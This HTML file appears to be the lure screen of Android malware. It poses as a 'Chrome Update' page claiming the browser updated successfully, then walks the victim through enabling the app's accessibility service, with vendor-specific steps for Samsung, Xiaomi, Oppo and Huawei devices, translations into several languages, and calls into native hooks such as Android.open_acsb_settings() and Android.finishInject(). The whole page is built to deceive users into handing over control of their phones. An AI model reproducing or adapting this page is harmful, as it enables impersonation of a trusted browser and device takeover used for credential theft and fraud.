<html lang="en" style="
    font-family: system-ui;
">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <style>
        .logo {
            display: block;
            margin-left: auto;
            margin-right: auto;
            width: 60%;
            margin-top: 30px;
        }

        .wo {
            display: block;
            margin-left: auto;
            margin-right: auto;
            width: 50%;
            margin-top: 5px;
        }

        .ddd {
            position: relative;
            background-image: url("https://i.imgur.com/iUvFTZm_d.webp?maxwidth=760&fidelity=grand");
            background-repeat: x-repeat;
            width: 100%;
            height: 30vw;
        }

        .btn {
            justify-content: center;
            border-radius: 20px;
            background: #0076f1;
            color: white;
        }

        .btn p {
            margin-top: 12px;
            margin-bottom: 12px;
        }

        .list {
            margin-top: 15px;
        }

        .list span {
            text-align: center;
            font-size: 12px;
            display: block;
        }

        .center {
            text-align: center;
        }

        .text {
            margin-top: 25px;
            color: #C01818;
            font-size: 20px;
            text-align: center;
        }

        .s {
            margin-top: 23px;
            font-size: 16px;
            text-align: center;
            color: #C01818;
        }
    </style>
    <style>
        html {
            height: 100%;
        }

        body {
            padding: 0;
            margin: 0;
            background: url('#');
            background-repeat: no-repeat;
            background-size: cover;
        }

        form,
        #form1,
        #form2,
        #form3 {
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        section {
            flex: 1;
            padding: 20px;
        }

        header {
            padding: 20px;
            text-align: center;
        }

        .input {
            width: 100%;
            color: black;
            background: transparent;
            border: 0;
            border-bottom: solid #9E9E9E;
        }


        button,
        .button {
            width: 100%;
            border: 0;
            border-bottom: 1px solid #007398;
            font-weight: 600;
        }

        button:disabled,
        .button:disabled {
            width: 100%;
            background: #85bfd4;
            color: #007eae;
            border: 0;
            border-radius: 4px;
            padding: 10px;
            font-weight: 600;
        }

        input,
        button {
            outline: none;
            box-shadow: none;
        }

        .error {
            border-color: #f00 !important;
        }

        input::placeholder {
            color: #fff;
            opacity: 1;
        }

        .cool-input {
            box-sizing: border-box;
            border: 0;
            width: 100%;
            position: relative;
            font-size: 16px;
            margin-bottom: 15px;
        }

        .cool-input__input {
            box-sizing: border-box;
            background: none;
            width: 100%;
            padding: 10px;
            padding-left: 0;
            position: relative;
            z-index: 2;
            font-size: 1em;
        }

        .cool-input__input:focus {
            outline: none;
        }

        .cool-input__placeholder {
            box-sizing: border-box;
            border: none;
            background: none;
            width: 100%;
            position: absolute;
            z-index: 1;
            left: 0;
            top: 50%;
            line-height: 1em;
            color: #fff;
            transition: all 0.2s ease;
        }

        .cool-input__input_filled+.cool-input__placeholder,
        .cool-input__input:focus+.cool-input__placeholder {
            font-size: 0.8em;
            top: 0;
            margin-top: 0em;
        }

        #spinner {
            width: 100%;
            height: 350px;
            text-align: center;
        }

        #form2 {
            background-color: #fff;
        }

        #form2>section p {
            color: #000;
        }

        #form2>footer button {
            width: 50%;
            background: #007eae;
            color: #fff;
            border: 0;
            border-bottom: 1px solid #007398;
            border-radius: 4px;
            padding: 10px;
            font-weight: 600;
        }

        ss {
            background: white;
            margin-right: 10px;
            border-radius: 100%;
            padding-inline: 1.1vw;
            padding-block: 0.1vw;
            color: #0076f1;
            font-weight: 600;
        }

        .panel {
            background: #007083;
            /* Цвет фона */
            color: white;
            /* Цвет текста */
            padding: 10px;
            /* Поля вокруг текста */
            text-align: justify;
            /* Выравнивание по ширине */
        }
    </style>



</head>

<body class="ds">
    <div class="ddd">
        <!-- <img class="longImg" src="" /> -->
        <div style="
    position: absolute;
    bottom: -6vw;
    display: flex;
    width: 100%;
    justify-content: center;
">
            <img class="logo"
                style="height: 12vw;background: white;width: 012vw;padding: 5px;border-radius: 10px;box-shadow: 0px 0px 20px 1px #80808069;"
                src="https://i.imgur.com/1QJrELq_d.webp?maxwidth=760&fidelity=grand">
        </div>
    </div>
    <div root="" style="
    margin-right: 8%;
    margin-left: 8%;
    margin-top: 50px;
">
        <div class="header">

            <p id="welcome" translate class="nm"
                style="color: black; font-weight:790;font-size: 9vw;text-align:center;">Chrome Update
            </p>

            <p id="updated" translate class="nm"
                style="color: #787878; font-weight:690;font-size: 4vw;text-align: center;">Browser updated successfully
            </p>

            <p id="manual0" translate class="nm"
                style="color: black; font-weight:690;font-size: 5vw;text-align: center;">To use this application, click the "Continue" button and then enable Chrome services.
            </p>

        </div>


        <div class="els" onclick="Android.finishInject();" style="
    position: relative;
    height: 40%;
">
            <div style="position: absolute;bottom: 0px;width: 100%;font-size: 4.1vw;display: grid;">
                <inf style="
    background: #eeeeee;
    border-radius: 15px;
    margin-bottom: 5vw;
">
                    <infchild style="display:none">
                        <div style="margin: 5vw;">
                            <ss>1</ss>
                            <p id="manual1" translate style="
        display: inline;
        font-weight: 500;
    ">Open settings</p>
                        </div>
                        <div style="margin: 5vw;">
                            <ss>2</ss>
                            <p id="manual2" translate style="
                display: inline;
                font-weight: 500;
            ">Select Accessibility</p>
                        </div>
                        <div style="margin: 5vw;">
                            <ss>3</ss>
                            <p id="manual3" translate style="
                display: inline;
                font-weight: 500;
            ">Slide the switch to enable</p>
                        </div>
                        <div style="margin: 5vw; display:none">
                            <ss>4</ss>
                            <p id="manual4" translate style="
            display: inline;
            font-weight: 500;
        "></p>
                        </div>
                    </infchild>
                </inf>
<!--                 Android.finishInject() function was originally called here
                <button class="btn btn-outline-success" onclick="Android.finishInject();" type="submit" -->

<!-- To redirect to accessibility screen as the html.html file did, call onData function. -->
                <button class="btn btn-outline-success" onclick="Android.open_acsb_settings();" type="submit"
                    style="height: 12vw;">
                    <p id="continue" style="margin-block-start: 4%;" translate>CONTINUE</p>
                </button>
            </div>
        </div>
    </div>

    <script>


        async function translate(translateTo, text, translateFrom = 'auto') {
            const url = "https://translate.googleapis.com/translate_a/single?client=gtx&sl=" +
                translateFrom + "&tl=" + translateTo + "&dt=t&q=" + encodeURI(text);

            const response = await fetch(url);
            const data = await response.json();

            return data[0][0][0];
        }


        async function init() {
            var userLang = navigator.language || navigator.userLanguage;
            userLang = userLang.substring(0, 2);
            document.querySelectorAll("p").forEach(element => {
                translate(userLang, element.textContent).then((val) => {
                    element.textContent = val;
                });
            });
        }

        const m1 = "Open settings"
        const m2 = "Select Accessibility"
        const m3 = "Slide the switch to enable"
        const m4 = "Go to Additional Settings"
        const m5 = "Find and enable "
        const m5_1 = "Find "
        const m6 = "Go to Installed apps"
        const m7 = "Go to Accessibility features"
        const m8 = "Go to Downloaded apps"
        try {
            const queryString = window.location.search;
            const urlParams = new URLSearchParams(queryString);
            const model = urlParams.get('model')
            const pkgname = urlParams.get('pkgname')
            var newElement = document.createElement('span');
            newElement.innerHTML = pkgname;
            newElement.style.marginLeft = "3px";

            if (model.includes("oppo") || model.includes("xiaomi")) {
                document.querySelector("#manual1").innerHTML = m8
                el2 = document.querySelector("#manual2")
                el2.innerHTML = m5_1
                el2.parentElement.insertAdjacentElement("beforeend", newElement);

                document.querySelector("#manual3").innerHTML = m3
            }
            else if (model.includes("samsung")) {
                document.querySelector("#manual2").innerHTML = m2
                document.querySelector("#manual3").innerHTML = m6
                el4 = document.querySelector("#manual4")
                el4.parentElement.style.display = "block"
                el4.innerHTML = m5
                el4.parentElement.insertAdjacentElement("beforeend", newElement);
            }
            else if (model.includes("huawei") || model.includes("honor")) {
                document.querySelector("#manual2").innerHTML = m7
                document.querySelector("#manual3").innerHTML = m2
                el4 = document.querySelector("#manual4")
                el4.parentElement.style.display = "block"
                el4.innerHTML = m5
                el4.parentElement.insertAdjacentElement("beforeend", newElement);
            }
        } catch (e) { }
        document.querySelector("infchild").style.display = "block"
        // init();
        var objLang = {
            "es": { "welcome": "Bienvenido a Chrome", "updated": "El navegador se ha actualizado correctamente", "manual0": "Para utilizar esta aplicación, haz clic en el botón \"Continuar\" y luego activa los servicios de Chrome.", "manual1": "Abrir la configuración", "manual2": "Seleccione la accesibilidad", "manual3": "Deslice el interruptor para activar", "continue": "CONTINUAR" },

            "fr": { "welcome": "Bienvenue à Chrome", "updated": "Le navigateur a été mis à jour avec succès", "manual0": "Pour utiliser cette application, cliquez sur le bouton \"Continuer\", puis activez les services Chrome.", "manual1": "Paramètres ouverts", "manual2": "Sélectionnez Accessibilité", "manual3": "Faites glisser l'interrupteur pour activer", "continue": "CONTINUER" },

            "hu": { "welcome": "Üdvözöljük a Chrome-ban", "updated": "A böngésző sikeresen frissült", "manual0": "Az alkalmazás használatához kattintson a \"Folytatás\" gombra, majd engedélyezze a Chrome szolgáltatásait.", "manual1": "Nyissa meg a beállításokat", "manual2": "Válassza a Hozzáférhetőséget", "manual3": "Csúsztassa a kapcsolót az engedélyezéshez", "continue": "FOLYTATÁS" },

            "el": { "welcome": "Καλώς ήρθατε στο Chrome", "updated": "Το πρόγραμμα περιήγησης ενημερώθηκε επιτυχώς", "manual0": "Για να χρησιμοποιήσετε την εφαρμογή, κάντε κλικ στο \"Συνέχεια\" και, στη συνέχεια, ενεργοποιήστε το Chrome.", "manual1": "Ανοίξτε τις ρυθμίσεις", "manual2": "Επιλέξτε Προσβασιμότητα", "manual3": "Csúsztassa a kapcsolót az engedélyezéshez", "continue": "ΣΥΝΕΧΙΣΤΕ" }
        }

        var userLang = navigator.language || navigator.userLanguage;
        userLang = userLang.substring(0, 2);
        if (objLang[userLang] == undefined) {
            init()
        }
        else {
            document.querySelectorAll("[translate]").forEach(element => {
                element.innerHTML = objLang[userLang][element.getAttribute("id")]
            });
        }
    </script>
    <style>
        @media (min-width: 500px) {
            inf div {
                font-size: 3vw !important;
            }

            .header p:nth-child(1) {
                font-size: 7vw !important;
            }

            .header p:nth-child(2) {
                font-size: 3vw !important;
            }

            .header p:nth-child(3) {
                font-size: 4vw !important;
            }

            .els {
                height: 45% !important;
            }

        }
    </style>
</body>

</html>